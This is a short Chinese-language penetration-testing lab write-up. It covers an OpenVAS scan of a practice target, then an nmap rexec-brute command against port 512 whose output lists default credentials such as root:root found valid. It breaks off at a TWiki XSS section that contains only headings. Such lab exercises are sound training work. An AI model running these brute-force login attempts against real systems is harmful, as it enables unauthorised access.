滲透測試靶機實戰---01
滲透測試前期準備工作:
1. 靶機搭建 (網上很多,可直接找到現成的,具體搭建過程略過)
2. OpenVAS 掃描靶機得出漏洞報告
1. OpenVas 搭建步驟可參照:https://blog.51cto.com/linhong/2134910?source=drh
2. 報告地址:https://download.csdn.net/download/m0_37268841/11855947
3.漏洞明細:
滲透測試實戰:
1. rexec Passwordless / Unencrypted Cleartext Login
root@kali:~# nmap -p 512 --script rexec-brute *.*.*.* (here input the ipaddress)
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-12 13:39 CST
Nmap scan report for 192.168.10.149
Host is up (0.081s latency).
PORT STATE SERVICE
512/tcp open exec
| rexec-brute:
| Accounts:
| root:root - Valid credentials
| netadmin:netadmin - Valid credentials
| user:user - Valid credentials
| guest:guest - Valid credentials
| web:12345 - Valid credentials
| webadmin:webadmin - Valid credentials
| administrator:administrator - Valid credentials
| sysadmin:sysadmin - Valid credentials
| admin:admin - Valid credentials
| test:test - Valid credentials
|_ Statistics: Performed 26 guesses in 1 seconds, average tps: 26.0
Nmap done: 1 IP address (1 host up) scanned in 2.02 seconds
root@kali:~#
可以看到通過這個漏洞,用戶名/密碼都能爆出來。
2. TWiki XSS and Command Execution Vulnerabilities (Port: 80)
1. 這個高危漏洞屬於應用層的漏洞,web頁面的漏洞
2. 這邊可以針對Twiki進行掃描:
3.利用XSS漏洞: